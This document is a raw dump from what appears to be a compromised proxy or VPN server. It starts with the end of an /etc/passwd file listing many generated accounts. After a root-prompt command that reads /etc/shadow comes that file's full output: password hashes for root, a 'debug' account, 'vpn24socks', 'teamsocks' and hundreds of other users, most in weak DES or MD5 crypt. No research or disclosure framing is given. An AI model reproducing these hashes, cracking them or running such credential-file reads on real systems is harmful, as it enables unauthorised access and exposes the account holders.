+KbZzI1EGD7:x:1411:1411::/home/SSHUSER:/usr/sbin/nologin +vwX6HwC8Lh:x:1412:1412::/home/SSHUSER:/usr/sbin/nologin +YbDmrQ3uHX:x:1413:1413::/home/SSHUSER:/usr/sbin/nologin +XwrlqzZcqt:x:1414:1414::/home/SSHUSER:/usr/sbin/nologin +Zr5u4mLaor:x:1415:1415::/home/SSHUSER:/usr/sbin/nologin +yRkX9kmf4d:x:1417:1417::/home/SSHUSER:/usr/sbin/nologin +VPPl3s7YUL:x:1418:1418::/home/SSHUSER:/usr/sbin/nologin +OTgrnEWUwc:x:1419:1419::/home/SSHUSER:/usr/sbin/nologin +G0OREuDm37:x:1420:1420::/home/SSHUSER:/usr/sbin/nologin +CQyjF4u7CS:x:1421:1421::/home/SSHUSER:/usr/sbin/nologin +XwU6xeJKMx:x:1422:1422::/home/SSHUSER:/usr/sbin/nologin +aklcI4G2Hr:x:1424:1424::/home/SSHUSER:/usr/sbin/nologin +mT7JPIqVuf:x:1425:1425::/home/SSHUSER:/usr/sbin/nologin +gsZxRf05sx:x:1426:1426::/home/SSHUSER:/usr/sbin/nologin +v716hX8oaW:x:1429:1429::/home/SSHUSER:/usr/sbin/nologin +Mmh3M4oP0v:x:1430:1430::/home/SSHUSER:/usr/sbin/nologin +ctV3NEzitO:x:1431:1431::/home/SSHUSER:/usr/sbin/nologin +wKer3VQNa8:x:1432:1432::/home/SSHUSER:/usr/sbin/nologin +76BuKJAIQs:x:1433:1433::/home/SSHUSER:/usr/sbin/nologin +k1dO6lfMNd:x:1434:1434::/home/SSHUSER:/usr/sbin/nologin +I6J3JHUqC1:x:1435:1435::/home/SSHUSER:/usr/sbin/nologin +GYoFHeDm0z:x:1436:1436::/home/SSHUSER:/usr/sbin/nologin +72YV5GHBVx:x:1438:1438::/home/SSHUSER:/usr/sbin/nologin +G71wfQEPoC:x:1439:1439::/home/SSHUSER:/usr/sbin/nologin +HgcCrXDKen:x:1440:1440::/home/SSHUSER:/usr/sbin/nologin +gbzSM7ywwW:x:1441:1441::/home/SSHUSER:/usr/sbin/nologin +dfJJwbDOaG:x:1442:1442::/home/SSHUSER:/usr/sbin/nologin +4Saf8LwCcR:x:1443:1443::/home/SSHUSER:/usr/sbin/nologin +1eeUWOlK9E:x:1444:1444::/home/SSHUSER:/usr/sbin/nologin +Cll4KDM0W3:x:1445:1445::/home/SSHUSER:/usr/sbin/nologin +OJAEWyDwCI:x:1446:1446::/home/SSHUSER:/usr/sbin/nologin +q1iyUEbI5V:x:1447:1447::/home/SSHUSER:/usr/sbin/nologin +2N1Uo47Mlg:x:1448:1448::/home/SSHUSER:/usr/sbin/nologin +ruVtSN24pr:x:1450:1450::/home/SSHUSER:/usr/sbin/nologin +zJltMD4mG9:x:1452:1452::/home/SSHUSER:/usr/sbin/nologin +WkUUS9RQf0:x:1454:1454::/home/SSHUSER:/usr/sbin/nologin +bWauNdcsMn:x:1455:1455::/home/SSHUSER:/usr/sbin/nologin +S5UKpRwg51:x:1456:1456::/home/SSHUSER:/usr/sbin/nologin +stFt5RwE33:x:1457:1457::/home/SSHUSER:/usr/sbin/nologin +OCUbNto6Bg:x:1458:1458::/home/SSHUSER:/usr/sbin/nologin +eIxatCSG1U:x:1459:1459::/home/SSHUSER:/usr/sbin/nologin +zXcXCYaIpo:x:1461:1461::/home/SSHUSER:/usr/sbin/nologin +RBNgJIRt49:x:1462:1462::/home/SSHUSER:/usr/sbin/nologin +niSxFcVo6S:x:1463:1463::/home/SSHUSER:/usr/sbin/nologin +Uxx9MvILLz:x:1464:1464::/home/SSHUSER:/usr/sbin/nologin +klYUlzI7cK:x:1465:1465::/home/SSHUSER:/usr/sbin/nologin +6m9Y1QaKr3:x:1466:1466::/home/SSHUSER:/usr/sbin/nologin +lVXZHCarqJ:x:1467:1467::/home/SSHUSER:/usr/sbin/nologin +4GWL9WXzxF:x:1468:1468::/home/SSHUSER:/usr/sbin/nologin +JxaTdAV8Rw:x:1469:1469::/home/SSHUSER:/usr/sbin/nologin +8P7jKJ2Nlh:x:1470:1470::/home/SSHUSER:/usr/sbin/nologin +vkE7Afv1aW:x:1471:1471::/home/SSHUSER:/usr/sbin/nologin +2Er5XcDGWA:x:1472:1472::/home/SSHUSER:/usr/sbin/nologin +qwBUev5nEp:x:1473:1473::/home/SSHUSER:/usr/sbin/nologin +muIspwxptl:x:1474:1474::/home/SSHUSER:/usr/sbin/nologin +e5yhvJdeTw:x:1475:1475::/home/SSHUSER:/usr/sbin/nologin +XUxzr4xMlT:x:1476:1476::/home/SSHUSER:/usr/sbin/nologin +va20H8Ol9R:x:1477:1477::/home/SSHUSER:/usr/sbin/nologin +qsAbm8ZMyg:x:1478:1478::/home/SSHUSER:/usr/sbin/nologin +9An1Ctk2Qa:x:1479:1479::/home/SSHUSER:/usr/sbin/nologin +Ey5cDS72xR:x:1480:1480::/home/SSHUSER:/usr/sbin/nologin +uCUqoIdGPa:x:1481:1481::/home/SSHUSER:/usr/sbin/nologin +N6fG120epq:x:1482:1482::/home/SSHUSER:/usr/sbin/nologin +gV0gXSFPQ8:x:1483:1483::/home/SSHUSER:/usr/sbin/nologin +FvxPhU3XUz:x:1484:1484::/home/SSHUSER:/usr/sbin/nologin +iYoWJEuIeo:x:1485:1485::/home/SSHUSER:/usr/sbin/nologin +ybLYgoCPNG:x:1486:1486::/home/SSHUSER:/usr/sbin/nologin +Z6pSiUldwy:x:1487:1487::/home/SSHUSER:/usr/sbin/nologin +TkRcTTkRSF:x:1488:1488::/home/SSHUSER:/usr/sbin/nologin +wHgs7nrMld:x:1489:1489::/home/SSHUSER:/usr/sbin/nologin +nUYfzYpR4G:x:1490:1490::/home/SSHUSER:/usr/sbin/nologin +8tEhjjRlAC:x:1491:1491::/home/SSHUSER:/usr/sbin/nologin +JpChWSSU54:x:1492:1492::/home/SSHUSER:/usr/sbin/nologin +EnwaHzdt35:x:1493:1493::/home/SSHUSER:/usr/sbin/nologin +juTd17x1Nc:x:1494:1494::/home/SSHUSER:/usr/sbin/nologin +TOTQ91BEwS:x:1495:1495::/home/SSHUSER:/usr/sbin/nologin +6UTA6cTgc2:x:1496:1496::/home/SSHUSER:/usr/sbin/nologin +93EP0GUfGC:x:1497:1497::/home/SSHUSER:/usr/sbin/nologin +N66NJ15WGg:x:1498:1498::/home/SSHUSER:/usr/sbin/nologin +yXmWg290xo:x:1499:1499::/home/SSHUSER:/usr/sbin/nologin +rcc6AHS1Jg:x:1500:1500::/home/SSHUSER:/usr/sbin/nologin +zXMmeDGbqP:x:1501:1501::/home/SSHUSER:/usr/sbin/nologin +7tdzW87F9R:x:1502:1502::/home/SSHUSER:/usr/sbin/nologin +dpswkJLMwG:x:1503:1503::/home/SSHUSER:/usr/sbin/nologin +azsvod1Qyg:x:1504:1504::/home/SSHUSER:/usr/sbin/nologin +72ju0LjHvy:x:1505:1505::/home/SSHUSER:/usr/sbin/nologin +73yatKHdOE:x:1506:1506::/home/SSHUSER:/usr/sbin/nologin +UWC2JU92e0:x:1507:1507::/home/SSHUSER:/usr/sbin/nologin +i1BmroAIeM:x:1508:1508::/home/SSHUSER:/usr/sbin/nologin +8sAlXL7Ibr:x:1509:1509::/home/SSHUSER:/usr/sbin/nologin +kk2M3z5gcp:x:1510:1510::/home/SSHUSER:/usr/sbin/nologin +9cK5xC48nV:x:1512:1512::/home/SSHUSER:/usr/sbin/nologin +SBAetxCLTy:x:1513:1513::/home/SSHUSER:/usr/sbin/nologin +8iZ9BfefaC:x:1514:1514::/home/SSHUSER:/usr/sbin/nologin +D73JHDlBCn:x:1515:1515::/home/SSHUSER:/usr/sbin/nologin +OkpQWghNPU:x:1516:1516::/home/SSHUSER:/usr/sbin/nologin +gUADWitYGX:x:1517:1517::/home/SSHUSER:/usr/sbin/nologin +DaGvQaxltT:x:1518:1518::/home/SSHUSER:/usr/sbin/nologin +pBw5St2oIK:x:1519:1519::/home/SSHUSER:/usr/sbin/nologin +f37WEzjkBK:x:1520:1520::/home/SSHUSER:/usr/sbin/nologin +23101kMksS:x:1521:1521::/home/SSHUSER:/usr/sbin/nologin +OmXdWCH5Fq:x:1522:1522::/home/SSHUSER:/usr/sbin/nologin +6HRKiqn5AS:x:1523:1523::/home/SSHUSER:/usr/sbin/nologin +p8aQLoUmKx:x:1524:1524::/home/SSHUSER:/usr/sbin/nologin +31YimlYNtc:x:1525:1525::/home/SSHUSER:/usr/sbin/nologin +P6q1AGVRjm:x:1526:1526::/home/SSHUSER:/usr/sbin/nologin +lK7CY8gP5z:x:1527:1527::/home/SSHUSER:/usr/sbin/nologin +y5MJDV3DL9:x:1528:1528::/home/SSHUSER:/usr/sbin/nologin +qAcEd9FYMX:x:1529:1529::/home/SSHUSER:/usr/sbin/nologin +GpEu7dTAI7:x:1530:1530::/home/SSHUSER:/usr/sbin/nologin +MSMzq0euqr:x:1531:1531::/home/SSHUSER:/usr/sbin/nologin +inlnCLfVUo:x:1532:1532::/home/SSHUSER:/usr/sbin/nologin +ollSVqKLpa:x:1533:1533::/home/SSHUSER:/usr/sbin/nologin +s2C71Wifr9:x:1534:1534::/home/SSHUSER:/usr/sbin/nologin +UxsvWRQWBq:x:1535:1535::/home/SSHUSER:/usr/sbin/nologin +QY6arE2Ydq:x:1536:1536::/home/SSHUSER:/usr/sbin/nologin +b5sNwDdmEK:x:1537:1537::/home/SSHUSER:/usr/sbin/nologin +pdpUuNAtXK:x:1538:1538::/home/SSHUSER:/usr/sbin/nologin +NxsMofNyV2:x:1539:1539::/home/SSHUSER:/usr/sbin/nologin +DtzoQ2Xw7q:x:1540:1540::/home/SSHUSER:/usr/sbin/nologin +tDBq7HfG3r:x:1541:1541::/home/SSHUSER:/usr/sbin/nologin +f8cDerX7wf:x:1542:1542::/home/SSHUSER:/usr/sbin/nologin +QoTkaCA5hf:x:1543:1543::/home/SSHUSER:/usr/sbin/nologin +Lmh9L2R8qz:x:1544:1544::/home/SSHUSER:/usr/sbin/nologin +kzgMwiKIDN:x:1545:1545::/home/SSHUSER:/usr/sbin/nologin +6pFUWCUnmw:x:1546:1546::/home/SSHUSER:/usr/sbin/nologin +Pgh2JWajwc:x:1547:1547::/home/SSHUSER:/usr/sbin/nologin +PKSb4b3iAN:x:1548:1548::/home/SSHUSER:/usr/sbin/nologin +5DeP78tYXf:x:1549:1549::/home/SSHUSER:/usr/sbin/nologin +ZDrNQotOat:x:1550:1550::/home/SSHUSER:/usr/sbin/nologin +rd5t8jfvnj:x:1551:1551::/home/SSHUSER:/usr/sbin/nologin +vuqRa4K55i:x:1552:1552::/home/SSHUSER:/usr/sbin/nologin +itMjMX8Zgb:x:1553:1553::/home/SSHUSER:/usr/sbin/nologin +MyxPyfxyxX:x:1554:1554::/home/SSHUSER:/usr/sbin/nologin +BcLoH5F0R3:x:1555:1555::/home/SSHUSER:/usr/sbin/nologin +9T9jRHvZ7q:x:1556:1556::/home/SSHUSER:/usr/sbin/nologin +ienW7EvZzk:x:1557:1557::/home/SSHUSER:/usr/sbin/nologin +kdo3z10kOe:x:1558:1558::/home/SSHUSER:/usr/sbin/nologin +WX4JFyd3V4:x:1559:1559::/home/SSHUSER:/usr/sbin/nologin +PAhJp3OPbl:x:1560:1560::/home/SSHUSER:/usr/sbin/nologin +cfmu8MNhEM:x:1561:1561::/home/SSHUSER:/usr/sbin/nologin +iyW122H0oe:x:1562:1562::/home/SSHUSER:/usr/sbin/nologin +3YePbBy2tp:x:1563:1563::/home/SSHUSER:/usr/sbin/nologin + +# cat /etc/shadow +root:uOSm9.x7gpWsQ:14915:0:99999:7::: +daemon:*:14642:0:99999:7::: +bin:*:14642:0:99999:7::: +sys:*:14642:0:99999:7::: +sync:*:14642:0:99999:7::: +games:*:14642:0:99999:7::: +man:*:14642:0:99999:7::: +lp:*:14642:0:99999:7::: +mail:*:14642:0:99999:7::: +news:*:14642:0:99999:7::: +uucp:*:14642:0:99999:7::: +proxy:*:14642:0:99999:7::: +www-data:*:14642:0:99999:7::: +backup:*:14642:0:99999:7::: +list:*:14642:0:99999:7::: +irc:*:14642:0:99999:7::: +gnats:*:14642:0:99999:7::: +nobody:*:14642:0:99999:7::: +libuuid:!:14642:0:99999:7::: +bind:*:14642:0:99999:7::: +fetchmail:*:14642:0:99999:7::: +sshd:*:14642:0:99999:7::: +stunnel4:!:14642:0:99999:7::: +smmta:*:14642:0:99999:7::: +smmsp:*:14642:0:99999:7::: +USgK1k659d:itB/c13dN/u7E:14738:0:99999:7::14828: +vpn24socks:$1$g9C2d1Pg$TYfku0QfqwZzCCrihY5BQ.:14897:0:99999:7::: +2ee2JLMeiD:iteTHaYjXCmVg:14741:0:99999:7::14771: +jguv7VJ6ii:itFCIPugyoVGA:14745:0:99999:7::14775: +sOxNXOP2PV:itiUb2mQGkMAM:14748:0:99999:7::14776: +IlE6hFCCQ9:it8sjuBu2UwmA:14758:0:99999:7::14788: +gxCDRFriLl:itATXQT/mvNEM:14759:0:99999:7::14927: +BulLYDNolq:it8SLiNmaP0kI:14760:0:99999:7::14790: +cEzN80h8BB:itl5alHHHRj/o:14761:0:99999:7::14791: +A49RKGrvdB:it.aXsDvAydCw:14761:0:99999:7::14791: +3uUk7DToWo:itIVK64.gWJAA:14761:0:99999:7::14791: +4MMRD3G8gT:it7z/czHZ/4gg:14764:0:99999:7::14794: +QIhyvtXwum:it2ATBMSEZyuY:14765:0:99999:7::14795: +bX8CG70Z8o:itJijnCruWn6s:14765:0:99999:7::14855: +NGHZWVpVuu:itwnfwU18AQZ6:14765:0:99999:7::14855: +MkdEe0NgXc:itiOdqfUCvOOY:14765:0:99999:7::14867: +VP3ofYe5qa:it17IG/Js9Vck:14767:0:99999:7::14797: +s9wnq4iJbL:itF7GdfK4cHwA:14768:0:99999:7::14798: +JF23IDOEX0:itjVH5xatvIjg:14769:0:99999:7::14799: +GOE9IvxCo8:itUnwzzVvUvfI:14770:0:99999:7::14800: +2mAWybIfou:itxaq4qqSWmrM:14770:0:99999:7::14800: +ywLRB9sQG5:it/JoBv/eYT5U:14770:0:99999:7::14800: +U5wILkFczX:itS09vevC2cUk:14771:0:99999:7::14801: +qU247MmWWp:itGjgxFlOLsNY:14771:0:99999:7::14801: +JpE3P8WgBN:itz5J2D3BnylQ:14772:0:99999:7::14802: +OTx2pkLemc:itdrcEiHMAcmo:14773:0:99999:7::14803: +tLDp1920ug:itrlGlUwCXA2.:14773:0:99999:7::14803: +pzSoTppzAu:itYHMFEVKujMQ:14774:0:99999:7::14804: +fcz40nnjZr:itrE5RglVeq6I:14775:0:99999:7::14805: +1TEkAllzys:itCa0ysI.zviM:14776:0:99999:7::14806: +WMfvkEivY0:itEB014a/919s:14776:0:99999:7::14806: +4Vvq0LAF9r:itQa.hMitwqBk:14780:0:99999:7::14810: +QVMgMXxSeK:itjWbRYcqg68.:14781:0:99999:7::14811: +dtxSHwZpH3:itylRO//M3ToE:14781:0:99999:7::14811: +Uth54wPUPD:itJq7wfSkYO0Y:14781:0:99999:7::14811: +eCWEZEQZVq:itQpFlgIXcbIs:14783:0:99999:7::14813: +wp6WkrrhkH:itFOBdWM6twuU:14783:0:99999:7::14814: +QLGAfXHUAX:it0QHPOluaMyM:14785:0:99999:7::14815: +NWPWWWxBnh:itUf75Y/bENEQ:14785:0:99999:7::14815: +LY5yDIThxj:itcfUQF1iv2/I:14787:0:99999:7::14817: +LvJSd7KRCq:itHhdmnQ5K1BU:14788:0:99999:7::14818: +DNlBW8cww2:it34R5ynNPess:14788:0:99999:7::14818: +22JAEReAWb:itYK1kHANDxdk:14789:0:99999:7::14819: +1U7iYfKkZg:itBz2LEk.iv9c:14789:0:99999:7::15149: +A9RlGkkBly:it2GU6kR9pzQQ:14791:0:99999:7::14821: +ezjCz5tTLo:it4LXhsv8Gp3Y:14792:0:99999:7::14822: +CZ298VrwyT:itCaZtRbDIyXc:14793:0:99999:7::14823: +DDFFWPh13H:itzt.DXQW5/8Y:14793:0:99999:7::14858: +FwKPqLl9HO:itJtQGEkrPt12:14794:0:99999:7::15154: +4GA5FfwFEB:itbSS8sFdc0XI:14795:0:99999:7::14825: +6RyUaunr8w:itprojJIZZK5k:14795:0:99999:7::14825: +O2cPtoYJSA:itELh9gttdfwA:14795:0:99999:7::14825: +OieOTeMsVT:itmaN6.6K.hks:14795:0:99999:7::14825: +nqh2PPsJoX:itxfNQjUZHEPs:14795:0:99999:7::14825: +vLymjSZ2PC:it/91D7UOOkPg:14796:0:99999:7::14826: +BB22Ob0wRq:itN1e64V2oPNE:14797:0:99999:7::14887: +osHYLha9Xa:itTVoqQl2rXro:14798:0:99999:7::14828: +Mjs6t1fh7r:ituFJPgjyRlmo:14799:0:99999:7::14829: +DEZtQQ9XlX:ithmUxn.OIhQ2:14800:0:99999:7::14830: +GIVQTfHrFc:itYXpaa4uuO0A:14800:0:99999:7::14830: +6keWEVe8CF:it4Z4E1cdXWTI:14801:0:99999:7::14831: +f4rKlco33u:it340SfG3g5ZQ:14802:0:99999:7::14844: +7iVUdiWpZI:it1tZD4MEeonE:14802:0:99999:7::14832: +WBuxr9t5xJ:itppUICuI64vQ:14802:0:99999:7::14832: +9q9ZUnLTQd:itHZZD4CYjEd2:14802:0:99999:7::14832: +Aw1GQfhx6F:itypRPeiXHUDw:14802:0:99999:7::14832: +uurtXDhjEU:itrLEiUz1FSgs:14803:0:99999:7::14833: +G7lfd8zf1h:ithYIaAgjMZy.:14803:0:99999:7::14834: +EMY6T7qTGu:itKs8yYfyU7Bs:14803:0:99999:7::14833: +IzPTVGc4Yo:it4AQn9hNTDpk:14803:0:99999:7::14833: +4RmVWo7T4v:itI86zNOA452w:14804:0:99999:7::14834: +z9VTnI5JJX:itL2OMielYObw:14804:0:99999:7::14834: +qF7C1TR0he:ithzxC2YWnZMo:14804:0:99999:7::14834: +OxUqFE7v5H:it0ak6/xHcP3g:14805:0:99999:7::14835: +QluTWIEQSG:itH4r8I9fzUJg:14805:0:99999:7::14835: +APi3yQS9Dt:it49aPUsbfswM:14805:0:99999:7::14835: +KscYKlIxxP:itkBdUgq1XVUk:14805:0:99999:7::14835: +4OrVVMvg5b:itsUVdh9jlIKI:14806:0:99999:7::14836: +9q9wWck1iv:itW9jPOWvAS.M:14807:0:99999:7::14837: +7T3MmDDuYA:itcx4CkzJFETM:14807:0:99999:7::14837: +9i3rSA1t3B:it.SYvXlNGEL6:14807:0:99999:7::14837: +OG60AiIy32:itQwkvbyk2rbk:14807:0:99999:7::14837: +XQlGb5EDEX:it39CL0eAM7eM:14808:0:99999:7::14838: +gSPbDrdVM7:it.OYEbMgwySk:14808:0:99999:7::14870: +bn1XjaAbBO:ithpu.MOWcN2Q:14808:0:99999:7::14838: +eEAGLP58B1:itASzjdyZDpVo:14808:0:99999:7::14868: +19vuUOl1DA:itiI2y7mrWeoI:14809:0:99999:7::14839: +GJTBqAX0Po:it1Uu/W3WNcUw:14810:0:99999:7::14840: +YlKhbzOzlW:itedPh8uS.GGE:14810:0:99999:7::14840: +P1IEuRFxoc:itWvqWDbD7LPs:14811:0:99999:7::14841: +M74tz0c6cB:itvzbN7i9gD76:14812:0:99999:7::14842: +pxCR5mWYxl:it29eclf7EmX2:14812:0:99999:7::14842: +BYBEFkGPOv:itnT9MWIzJSMA:14812:0:99999:7::14842: +bLQLndsfG7:itOU5lmCywYyA:14812:0:99999:7::14842: +7RsRZ2UUu4:itJQWHjmDMSBg:14813:0:99999:7::14843: +gbWPMY3QUz:itMWiO7Rdw7j.:14814:0:99999:7::14844: +3DPSaYAK0I:itnXdG3B7xJJo:14815:0:99999:7::14870: +Mfa9YHsFwm:ittgjSkT2gj4k:14816:0:99999:7::14846: +MCdvro0waF:it3nns/B37m8A:14816:0:99999:7::14846: +4qTipZxa3g:it/TEdalbJMfM:14816:0:99999:7::14874: +jzJtLApQhG:itsr9y.rbSg4Q:14818:0:99999:7::14848: +MfJ1grnWz2:itGx1RoQ6IKB6:14818:0:99999:7::14877: +TKTlaudWc6:itPNHr6KpAPRQ:14819:0:99999:7::14849: +Pg6UVUT4Zi:itApd4kWtPxgI:14820:0:99999:7::14850: +7KxfsATvUY:it7TTxqh9nyK2:14820:0:99999:7::14850: +1YzAOqKyJU:it6ZiWQAL2wmU:14820:0:99999:7::14850: +ArAdFXiTdV:itvOH9eWcd6hE:14820:0:99999:7::14850: +Tyt6Mxbjb9:itkMpS8/7LT4E:14822:0:99999:7::14912: +p5TdBxcMOd:it5XCnCv7GOWc:14822:0:99999:7::14852: +HCj78QJ6bB:itV2E5FPhjv/Q:14823:0:99999:7::14853: +ataiqUNkhi:itFF/b/bbv4dg:14823:0:99999:7::14853: +BDnc11BaRR:itAgVwadM3n1o:14824:0:99999:7::14854: +0xs05pGnsc:itb2On91sFue2:14825:0:99999:7::14855: +6lCpT6Rtlb:itLieCtWiSNmk:14825:0:99999:7::14855: +MZGuvPmcQQ:itwBeYSCWzonc:14825:0:99999:7::14855: +S393KhVsS0:it0ImcxR03.Bc:14825:0:99999:7::14825: +hePPBhA3Zb:iteURoscPLWpE:14825:0:99999:7::14855: +xU33BmPZBt:itkHe9tsySfM2:14826:0:99999:7::14858: +8kTCqMWNer:itlb1jZxpEa4w:14828:0:99999:7::14858: +Z9mwX94DwA:it3WSVa8R07ls:14830:0:99999:7::14860: +QE70dT7Sk6:it0Tv1gANLfrw:14832:0:99999:7::15011: +3nRGuwyy3O:itRWTUESeEAnM:14832:0:99999:7::14862: +7lHu9x5ahz:itLFhHr4cMgEA:14832:0:99999:7::14862: +yQt4twcYHi:it9/qpjACWSpA:14832:0:99999:7::14862: +5QOvATUZRp:itkUCczUilUa6:14833:0:99999:7::14863: +qrIJmTNsip:itQn6yP0a1D3w:14834:0:99999:7::14932: +3MD6MyTcBm:itkGQqOqkAd6A:14834:0:99999:7::14864: +tX55vN8iBA:itVhqTDrPxB3E:14835:0:99999:7::14865: +MUF31iM1WD:it1bqY2btUtgc:14835:0:99999:7::14865: +6I1FTys1aV:it1G8ffMZkwBs:14836:0:99999:7::14926: +wH5nC1icK0:itsxFgyt7IG7.:14837:0:99999:7::14837: +z9GYUjVR9T:itW2tKlBIbklM:14837:0:99999:7::14842: +uiv8RD7GCm:itSRd/dT4W7ig:14837:0:99999:7::14867: +debug:$1$yShOv8Qf$hR6RSu48g2kUAOV18q23Q.:14837:0:99999:7::: +udewQStk6R:itqzk9aMNRAtI:14837:0:99999:7::14867: +YRfpne3P1W:it7MwZ1NA4Qg6:14838:0:99999:7::14868: +2G6ixqigXX:itYHt1qHMyxg6:14838:0:99999:7::14868: +FZ6nGPBlnq:itTB9Xib/.Jms:14838:0:99999:7::14868: +N4WUxGoeHX:itEmsj0kbt5Ig:14838:0:99999:7::14868: +3qoY48h6od:itzq1YDUTChmo:14839:0:99999:7::14869: +0KltTgDdxs:itjH.XV1RHImM:14839:0:99999:7::14869: +KnOIZkAYhv:itB/NLcosNZao:14840:0:99999:7::14870: +pduruQrvQw:itiNBdTTqSHXc:14841:0:99999:7::14871: +gfPh6U7BSL:itCwYFdL4JCUs:14842:0:99999:7::14872: +5d4PClWw9W:it8p4QD0G52a.:14842:0:99999:7::14872: +X3IwwuMhVn:itNC9p4Jw4Sew:14842:0:99999:7::14872: +9lKRF8UVul:itpPmVNnqzz8s:14843:0:99999:7::14875: +7OEkZFXfrj:itW9kD.grdiZc:14844:0:99999:7::14874: +XR9kXMus18:itup25xiWxlJE:14844:0:99999:7::14874: +LeJdtNDj0s:itu.0zdvPYBqU:14844:0:99999:7::14874: +sMdDwKbykL:itUWFJ7x2CEvE:14844:0:99999:7::14874: +RLPQ9lCkkg:itSEmJMpmRKuY:14845:0:99999:7::14875: +m07JSN8S1t:ithZZB/vxmf9s:14845:0:99999:7::14875: +KoW5ucmliR:itbs5gLqLFQ6U:14845:0:99999:7::14875: +vxaNuWuV5A:itQ/9L7nfjCGs:14846:0:99999:7::14876: +r6cQANOWcM:iteuR8tiYJc0A:14846:0:99999:7::14876: +GefhxHzMLB:itbcf7Sdv5haA:14847:0:99999:7::14877: +gghzgxMlzK:itv2DXUhR8k.E:14848:0:99999:7::14878: +dTECuvvcnY:itjIptA916Ebc:14848:0:99999:7::14878: +teamsocks:itt.x7Yyh3o4c:14848:0:99999:7::15706: +2ZzW1TPwek:italJuFQJ5a3s:14850:0:99999:7::14880: +98pASZD7ZL:itxSgbMMIp5Ss:14850:0:99999:7::14880: +rgNCfMxMDE:itUv8r76CvnFE:14852:0:99999:7::14942: +TPJNO6U7gB:it3nK7o5rGQTs:14854:0:99999:7::14884: +ZfQAMBcfd9:itn/Ahnp4SGYI:14855:0:99999:7::14885: +DWJLuNgRHq:it7fcSOrx.qzs:14856:0:99999:7::14886: +26PWTAtsMQ:itp0wE97MeJeY:14856:0:99999:7::14886: +wiDxLyK5di:itGyNef3zsBUc:14856:0:99999:7::14886: +OOueJqB7Ux:itLOQI2IJENTA:14856:0:99999:7::14946: +EaDZkcpMhf:itabLuw41OymE:14856:0:99999:7::14886: +swj3AHcyct:itgTFah5u7zEE:14857:0:99999:7::14887: +tf1x5jgZf7:it5.he.1J8Tos:14857:0:99999:7::15217: +fTkJjFodJR:itlImxgGtzX8E:14858:0:99999:7::14888: +q8Ospeoqjm:itfK2S6qHfdY.:14858:0:99999:7::14888: +atIdo8CMgl:itDJAu0FCjkD6:14858:0:99999:7::14888: +AIVtIPpwbI:it./a4jMDch9s:14858:0:99999:7::14888: +83ssqOi2mG:itf5ysL1ik1Uo:14859:0:99999:7::14889: +mDhIWzTPpL:itlbdpvX.70XI:14859:0:99999:7::14889: +aw1h0yzOXG:it7nEFlm.U1HE:14860:0:99999:7::14890: +8aXdZvgEAL:itHvOP3gWy0Ek:14860:0:99999:7::14890: +7DpjZkkKRH:it8lCum3QfKEE:14861:0:99999:7::14952: +AA4KnP2gQo:itYZtCLpMWh.6:14861:0:99999:7::14891: +OdJUE9NXz0:itPdSjh4MZGNk:14861:0:99999:7::14891: +WRwA7CA595:itk9xrbc96b6k:14862:0:99999:7::14892: +UHJXsI3u7T:itvRm6Pm8LxZs:14862:0:99999:7::14896: +AfPMi3Orqx:itK3vLE/cImqE:14862:0:99999:7::14892: +IIpk9TW4Hy:itjUMQ7TIWFks:14863:0:99999:7::14893: +GfXK6QYZvV:itEba4yQ5bD7Y:14863:0:99999:7::14893: +O2JLXab4Qb:itCguhLtUWcso:14864:0:99999:7::14894: +abobJxNBqT:itPzo69efPDNI:14865:0:99999:7::14895: +PAZYQvYMzp:itJXiA.Q6LtCs:14865:0:99999:7::14895: +mein:itz93owDvH2ig:14868:0:99999:7::14975: +In1AVHseTI:its.B5WuD6CPI:14868:0:99999:7::14898: +1yNGl2LCqo:itfhGvLrzeOro:14869:0:99999:7::14899: +UcblLYHagd:itrGN5VJ63iv2:14870:0:99999:7::14908: +GXFmqv0v6j:it4egLMyCOPXQ:14870:0:99999:7::14960: +eb0MkURFMR:iteVQ0NCSyuz2:14871:0:99999:7::14901: +ZF0P5R5HY1:itYKl7wO/tN6w:14871:0:99999:7::14901: +raiesY1Uya:it9XdP1qAJmpI:14871:0:99999:7::14961: +6vWXOICD5H:itAlbixHt8.fY:14871:0:99999:7::14901: +EHgdxvxbz6:it6FuhzCGg6TA:14871:0:99999:7::14901: +A9cAJOMNCY:it57H1zG3qv.Y:14872:0:99999:7::14901: +tHx7Nh5Kfp:itaW6Jr4ZZU.A:14874:0:99999:7::14979: +cvs7ZHnMch:itqel0UM7hH0k:14874:0:99999:7::14904: +R2XHmC62ZS:itSJbO1UjIVk.:14874:0:99999:7::14904: +OthdQ1Nmh5:itHAEGeiEMFhc:14874:0:99999:7::14905: +bhUizLPv0M:itHrknSzaql8U:14875:0:99999:7::14905: +FqBNIU3BXX:itL7IoJ8HGtjQ:14875:0:99999:7::14905: +cYuowtqfqp:it7vPDLMFamNU:14877:0:99999:7::14913: +ohLtOJoye9:itDe3UkvVMw/o:14877:0:99999:7::14967: +0xlfaHuCkh:itgwvKix98Szs:14879:0:99999:7::14909: +9oaRxjmjhy:itG4hyGTxFl9U:14881:0:99999:7::14911: +8YNxD3ah6D:itg0cQ4Ya.K2A:14881:0:99999:7::14911: +vd8oJtJgZr:itkGNuz.DvpB.:14883:0:99999:7::14913: +NwIUjcCYZG:itn7cOK0MxTPU:14884:0:99999:7::14914: +4nduuzyTQx:itmTdvrcDqztk:14885:0:99999:7::14915: +9qAqHLtLBx:it1RA5I5xwmyo:14886:0:99999:7::14939: +tuy9erQgxJ:itz9g1V7Y1Vog:14886:0:99999:7::14916: +GMunVltQvi:itlZMoR4eis5Q:14887:0:99999:7::14917: +sqYWjLaKXf:itaBZ/6eFpuME:14887:0:99999:7::14917: +ymLHzXSVjD:itiepJpQGPLR2:14888:0:99999:7::14918: +cG6fOsmfgT:itVe1Sv269.cE:14888:0:99999:7::14918: +Xv02xz1TQc:itNvLoD4b2F2U:14888:0:99999:7::14918: +13rRlbMsXc:itBiYQEEILlTA:14889:0:99999:7::14919: +o1NbEhdi1P:it5mVEaFWNf1.:14892:0:99999:7::14922: +SvOn61Ck0K:itTHDnZHL3bH6:14893:0:99999:7::14923: +LykwDkKp22:itk3nH54N5/lA:14894:0:99999:7::14924: +gDFHnIx6gq:itCJAnpVw.1oE:14894:0:99999:7::14929: +BQBra5cl9R:itxMiTR8/w.HU:14894:0:99999:7::14953: +4DaHNYAOXR:it/K.0bHmCxBM:14894:0:99999:7::14924: +mybkiYHe4L:itHs/OAKJg9PA:14895:0:99999:7::14935: +EZPpg2A55v:itUuxKhoP1VMI:14895:0:99999:7::14925: +ZtLdtMOxjz:itvFAdL7qAoAs:14896:0:99999:7::15256: +zyDY1v3Ifs:itxQpXl2lf5sw:14897:0:99999:7::14927: 